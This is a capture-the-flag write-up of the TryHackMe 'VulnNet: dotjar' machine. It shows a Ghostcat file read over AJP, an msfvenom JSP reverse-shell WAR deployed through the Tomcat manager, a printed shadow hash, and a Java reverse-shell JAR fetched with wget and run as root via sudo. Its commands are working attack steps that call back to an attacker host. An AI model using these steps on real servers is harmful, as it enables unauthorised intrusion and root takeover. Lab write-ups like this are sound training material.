VulnNet: dotjar

This is VulnNet: dotjar from THM. It’s medium rated, and says:

A new machine means a new web implementation. Foothold should be rather easy-going as long as you connect the dots. Privilege escalation might depend on your Java knowledge, don’t worry though, I’m rather a person who avoids Java and I still had a lot of fun working on this machine.

Ports

8009 and 8080 only. Port 8009 is Apache Jserv (Protocol v1.3); this will be important.

8080

We have Apache Tomcat, which I’ve seen in several CTFs now and usually with default credentials. However, that isn’t the case today - I tried a few; nothing. Now what?

8009

Apache Jserv (Protocol v1.3) is vulnerable to the Ghostcat LFI vulnerability, which is also explained here. There is an exploit on github, and we can use it as the Medium blog describes, firstly to read WEB-INF, and then:

┌──(root💀kali)-[/opt/thm/dotjar]
└─# python3 exploit.py  http://10.10.124.0:8080/ 8009 /WEB-INF/web.xml read
# stuff, removed
     VulnNet Dev Regulations - mandatory
 
1. Every VulnNet Entertainment dev is obligated to follow the rules described herein according to the contract you signed.
2. Every web application you develop and its source code stays here and is not subject to unauthorized self-publication.
-- Your work will be reviewed by our web experts and depending on the results and the company needs a process of implementation might start.
-- Your project scope is written in the contract.
3. Developer access is granted with the credentials provided below:
 
    creds:REDACTED
 
GUI access is disabled for security reasons.
 
4. All further instructions are delivered to your business mail address.
5. If you have any additional questions contact our staff help branch.
# stuff, removed

With our credentials, we can log in - but notice the line above:

GUI access is disabled for security reasons.

So it’s CLI all the way.

Generate a payload with MSFVENOM

┌──(root💀kali)-[/opt/thm/dotjar]
└─# msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.9.10.123 LPORT=1234 -f war > shell.war
Payload size: 1087 bytes
Final size of war file: 1087 bytes

And send it up the line:

┌──(root💀kali)-[/opt/thm/dotjar]
└─# curl -v -u 'REDACTED' --upload-file shell.war "http://10.10.124.0:8080/manager/text/deploy?path=/hack&update=true"
*   Trying 10.10.124.0:8080...
* Connected to 10.10.124.0 (10.10.124.0) port 8080 (#0)
* Server auth using Basic with user 'webdev'
> PUT /manager/text/deploy?path=/hack&update=true HTTP/1.1
> Host: 10.10.124.0:8080
> Authorization: Basic CREDS:REDACTED==
> User-Agent: curl/7.74.0
> Accept: */*
> Content-Length: 1087
> Expect: 100-continue
> 
* Mark bundle as not supporting multiuse
< HTTP/1.1 100 
* We are completely uploaded and fine
* Mark bundle as not supporting multiuse
< HTTP/1.1 200 
< Cache-Control: private
< Expires: Thu, 01 Jan 1970 00:00:00 GMT
< X-Content-Type-Options: nosniff
< Content-Type: text/plain;charset=utf-8
< Transfer-Encoding: chunked
< Date: Sat, 24 Apr 2021 10:44:52 GMT
< 
OK - Deployed application at context path [/hack]
* Connection #0 to host 10.10.124.0 left intact

Start a listener and visit http://10.10.124.0:8080/hack/ in the browser (or curl I guess):

┌──(root💀kali)-[/opt/thm/dotjar]
└─# nc -nvlp 1234                                              
listening on [any] 1234 ...
connect to [10.9.10.123] from (UNKNOWN) [10.10.124.0] 60308
id
uid=1001(web) gid=1001(web) groups=1001(web)

Boom, we’re on.

Privesc

It takes some enumeration, but we find a hash for our next user:

web@vulnnet-dotjar:/dev/shm$ gunzip shadow-backup-alt.gz # where did it come from? find it yourself lol
web@vulnnet-dotjar:/dev/shm$ ls
ls
shadow-backup-alt
web@vulnnet-dotjar:/dev/shm$ ls -lash
ls -lash
total 376K
   0 drwxrwxrwt  2 root root  100 Apr 24 13:41 .
   0 drwxr-xr-x 17 root root 3.7K Apr 24 12:22 ..
4.0K -rw-r-----  1 web  web  1.2K Apr 24 13:41 shadow-backup-alt
web@vulnnet-dotjar:/dev/shm$ file sh
file shadow-backup-alt 
shadow-backup-alt: ASCII text
web@vulnnet-dotjar:/dev/shm$ cat sh
cat shadow-backup-alt 
root:$6$FphZT5C5$cH1.ZcqBlBpjzn2k.w8uJ8sDgZw6Bj1NIhSL63pDLdZ9i3k41ofdrs2kfOBW7cxdlMexHZKxtUwfmzX/UgQZg.:18643:0:99999:7:::
daemon:*:18642:0:99999:7:::
bin:*:18642:0:99999:7:::
sys:*:18642:0:99999:7:::
# other hashes, you get the idea

From this there is a hash you can crack with John, and su to jdk-admin.

Root

jdk-admin@vulnnet-dotjar:/dev/shm$ sudo -l
sudo -l
Password: REDACTED

Matching Defaults entries for jdk-admin on vulnnet-dotjar:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User jdk-admin may run the following commands on vulnnet-dotjar:
    (root) /usr/bin/java -jar *.jar

Okay so we need an executable JAR file to run; I want one to give me a reverse shell. I get it from here, but it’s for Windows. Nevermind, just change this:

Process p = new ProcessBuilder(“C:\Windows\System32\cmd.exe”).redirectErrorStream(true).start();

to this:

Process p = new ProcessBuilder(“/bin/sh”).redirectErrorStream(true).start();

We need to compile it and turn it into an executable JAR:

┌──(root💀kali)-[/opt/thm/dotjar/callback]
└─# javac --release 8 connectback.java                                                   
Picked up _JAVA_OPTIONS: -Dawt.useSystemAAFontSettings=on -Dswing.aatext=true

┌──(root💀kali)-[/opt/thm/dotjar/callback]
└─# jar cmf connectback.mf connectback.jar connectback.class connectback.java
Picked up _JAVA_OPTIONS: -Dawt.useSystemAAFontSettings=on -Dswing.aatext=true

Note I had a newer JDK than the box and it wouldn’t work, hence the –release 8 option. Upload the file and run it (yeah, it took me a few goes):

jdk-admin@vulnnet-dotjar:/dev/shm$ !16 && !18
!16 && !18
rm connectback.jar  && wget http://10.9.10.123:9090/connectback.jar && sudo -u root /usr/bin/java -jar connectback.jar
--2021-04-24 14:09:34--  http://10.9.10.123:9090/connectback.jar
Connecting to 10.9.10.123:9090... connected.
HTTP request sent, awaiting response... 200 OK
Length: 1887 (1.8K) [application/java-archive]
Saving to: ‘connectback.jar’

connectback.jar     100%[===================>]   1.84K  --.-KB/s    in 0.001s  

2021-04-24 14:09:34 (2.20 MB/s) - ‘connectback.jar’ saved [1887/1887]

And in another listener:

┌──(root💀kali)-[/opt/thm/dotjar]
└─# nc -nvlp 9999        
listening on [any] 9999 ...
connect to [10.9.10.123] from (UNKNOWN) [10.10.124.0] 51976
id;hostname;date
uid=0(root) gid=0(root) groups=0(root)
vulnnet-dotjar
Sat Apr 24 14:10:00 CEST 2021

Thanks to TheCyb3rW0lf.